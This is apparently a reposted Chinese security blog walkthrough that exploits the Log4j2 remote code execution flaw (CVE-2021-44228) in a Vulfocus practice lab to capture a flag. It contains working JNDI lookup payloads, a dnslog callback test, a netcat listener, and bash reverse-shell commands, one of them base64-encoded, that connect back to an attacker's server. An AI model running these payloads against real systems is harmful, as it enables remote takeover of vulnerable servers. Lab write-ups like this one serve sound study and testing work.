CVE-2021-44228——Vulfocus-Log4j2-RCE

admin 2022年1月14日13:00:50评论192 views字数 1281阅读4分16秒阅读模式
 CVE-2021-44228——Vulfocus-Log4j2-RCE

点击上方蓝字

给一个关注吧



CVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCE


漏洞描述

CVE-2021-44228——Vulfocus-Log4j2-RCEApache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的 重写,并且引入了大量丰富的特 性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能 而被广泛的应用于各种常见的 Web 服务中。

漏洞评级

Apache Log4j 远程代码执行漏洞 :严重

CVE-2021-44228——Vulfocus-Log4j2-RCE

影响范围

https://fofa.so/static_pages/log4j2

CVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCE

Apache log4j2 2.* <= Apache log4j2 2.15.1.rc1

主流相关产品

Spring-Boot-strater-log4j2

Apache Struts2

Apache Solr

Apache Flink

Apache Druid

ElasticSearch

Vuofocus

http://vulfocus.fofa.so/

CVE-2021-44228——Vulfocus-Log4j2-RCE启动靶场CVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCE

Dnslog出网测试

http://www.dnslog.cn/

payload GET方式提交CVE-2021-44228——Vulfocus-Log4j2-RCE

payload

payload=${jndi:ldap://X.X.X.X/exp}
payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}

用payload打的时候发现服务器返回404 原因是因为GET数据传输要URL编码CVE-2021-44228——Vulfocus-Log4j2-RCE

CVE-2021-44228——Vulfocus-Log4j2-RCEURL编码后提交正常CVE-2021-44228——Vulfocus-Log4j2-RCEDNSlog成功回显CVE-2021-44228——Vulfocus-Log4j2-RCE

JNDI注入反弹shell

JNDI

https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

VPS监听端口

nc -lvp 7777

CVE-2021-44228——Vulfocus-Log4j2-RCEJNDI注入CVE-2021-44228——Vulfocus-Log4j2-RCE

替换JNDI中对应的payloadCVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCE

反弹shell

bash -i >& /dev/tcp/ip/port 0>&1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"  -A   [vps ip]

反弹shell命令进行了base64编码

https://www.jackson-t.ca/runtime-exec-payloads.html

CVE-2021-44228——Vulfocus-Log4j2-RCE反弹shell成功拿到flagCVE-2021-44228——Vulfocus-Log4j2-RCECVE-2021-44228——Vulfocus-Log4j2-RCE

「关注下方公众号了解更多网络资讯~」


CVE-2021-44228——Vulfocus-Log4j2-RCE

end






个人简介:李白华为云享专家、阿里云博客专家、CSDN网络领域优质创作者、掘金创作者BOSS有了创作者公众号【李白你好】、华为HCIE,全网粉丝3万+。我是一个爱好计算机科学,求索于逻辑思维的同时不忘哲学和浪漫主义科学,乐于分享技术与快乐的博主。博文内容涉及网络¥安全,web渗透测试、内网安全、二进制安全、工业控制安全、app、逆向等。

CVE-2021-44228——Vulfocus-Log4j2-RCE

                                                           

CVE-2021-44228——Vulfocus-Log4j2-RCE

微信:libaisec

微信交流群:加我微信拉你进群和工程师们学技术聊人生



CVE-2021-44228——Vulfocus-Log4j2-RCE


原文始发于微信公众号(李白你好):CVE-2021-44228——Vulfocus-Log4j2-RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月14日13:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-44228——Vulfocus-Log4j2-RCEhttps://cn-sec.com/archives/737169.html

发表评论

匿名网友 填写信息